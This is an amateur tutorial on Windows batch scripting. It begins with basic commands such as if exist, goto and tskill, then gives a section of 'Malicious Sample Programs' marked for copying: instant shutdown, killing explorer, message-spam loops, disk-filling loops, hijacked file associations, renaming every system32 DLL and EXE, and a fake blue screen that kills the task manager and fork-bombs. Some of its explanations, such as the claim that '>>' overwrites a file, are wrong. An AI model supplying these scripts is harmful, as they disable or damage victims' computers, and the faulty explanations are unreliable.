Batch Programs

Facts: In DOS, OS/2, and Microsoft Windows, a batch file is a text file containing a series of commands intended to be executed by the command interpreter. When a batch file is run, the shell program (usually COMMAND.COM or cmd.exe) reads the file and executes its commands, normally line-by-line. Batch files are useful for running a sequence of executables automatically and are often used by system administrators to automate tedious processes.



"If exist" statement
There is a special "If exist" statement that can be used to test for the existence of a file, followed by a command. An example would be:

If exist somefile.ext del somefile.ext

You can also use a negative existence test:

if not exist somefile.ext echo no file



The "goto" command
Generally, the execution of a batch file proceeds line-by-line with the command(s) on each line being run in turn.



GOTO :label
...some commands
:label
...some other commands


Usable commands:

:loop //can be any name

START directory path or certain program to be executed.

GOTO loop //this will loop the START, on whatever is going to be execute.

Tskill
An example of a simple command that would end Notepad would be tskill notepad Another example is ending all the Microsoft documents that you have open tskill winword All open Word documents will be closed but the contents will not be saved so make sure to save important work. An administrator can close processes that might be running in sessions started by other users.

The command tskill winword /a will close everybody's open Word documents.



Choice Selection
Example:

@echo off

echo ===============
echo Selection Menu
echo ===============
echo 1 - Re-associate files (Dangerous Level: 7/10)
echo 2 - Shutdown System (Dangerous Level: 3/10)
echo 3 - Disable USB Ports (Dangerous Level: 9/10)

:choice
set /P C=[1,2,3,4] Please Select a Choice :
if "%C%"=="4" goto 4
if "%C%"=="3" goto 3
if "%C%"=="2" goto 2
if "%C%"=="1" goto 1
goto choice

:1
Msg * Nothing at the moment...
goto choice

:2
C:\Testing\shut.bat
goto choice

:3
C:\Testing\USB.vbs
goto choice

:4
echo ====== Program End ======
Pause
:end



Some Malicious Sample Programs

Common instant shutdown a system batch coding.
::COPY UNDER::

@echo off

TITLE Instant Shutdown

shutdown -s -t 1

::COPY END::


Task Killing Processes
::COPY UNDER::

@echo off

tskill explorer /a

::COPY END::
*By Executing this, will results in the restart of the explorer bar or Start Bar.


Looping of Irriating Messages.
::COPY UNDER::

@echo off

:loop
Msg * Ping! Ping!
GOTO loop

::COPY END::


Creating a For loop counting via 3 files.
::COPY UNDER::

@echo off

cd\

md Space

for /l %%x in (10,10,999999999) do (

(echo %%x >>%systemdrive%/Space/numbers1.txt)
(echo %%x >>%systemdrive%/Space/numbers2.txt)
(echo %%x >>%systemdrive%/Space/numbers3.txt)

)
::COPY END::


Malicious Re-association:
::COPY UNDER::

@echo off

Title Processing...

assoc .jpg=txtfile
assoc .html=.jpgfile
assoc .doc=bmpfile
assoc .mp3=htmlfile

::COPY END::
*The abovementioned, is to re-associate files to another format (Can be dangerous if executed incorrectly).


Timer style:
::COPY UNDER::

@echo off

title Timer

ping localhost -n 30 > nul

::COPY END::
*Ping your own local NIC card for 30secs.(Nothing really malicious about this, LOL)


Malicious Renaming:
::COPY UNDER::

@echo off

cd "%systemroot%/system32"

rename *.dll *.101
rename *.exe *.102

::COPY END::
*This may cause unstable of a system, execute in under virutal pc or VMware


Insider Command + Fraud BlueScreen of Death:

::COPY UNDER::

@echo off

Title STOP: 0x00000050 (0xFD3094C2, 0x00000001, 0xFBFE7617)

COLOR 1F

echo A problem has been deteced and Windows has been shut down to prevent
echo damage to your computer.
echo.
echo The problem seems to be casued by the following files: adb.dll
echo.
echo PAGE_FAULT_IN_NONPAGED_AREA
echo.
echo Check to make sure anay new hardware of software is properly installed.
echo If this is a new installation, ask your hardware or software manufacturer
echo for any window updates you might need.
echo.
echo Technical information:
echo.
echo *** STOP: 0x00000050 (0xFD3094C2, 0x00000001, 0xFBFE7617)
echo.
echo *** adb.dll - Address base at 0x00000050.
echo.

Set /p c=Press enter key to Continue...
if "%c%"=="%random%" goto 1

:1
taskkill /f /im explorer.exe
taskkill /f /im taskmgr.exe
:loop
START
GOTO loop

GOTO End

::COPY END::
*This shows how to randomly bluff a user on a blue screen and push the enter key button to execute another command



Using batch files on output to any file format

Example 1:

Hello there beautiful world! > hello.txt
My name is blah blah blah >> hello.txt

">" Which means that you output the file to a format of any
">>" Which means overwriting the existing file name that shown above.

*The final output of the hello.txt will include "Hello there beautiful world!" and "My name is blah blah blah" shown below.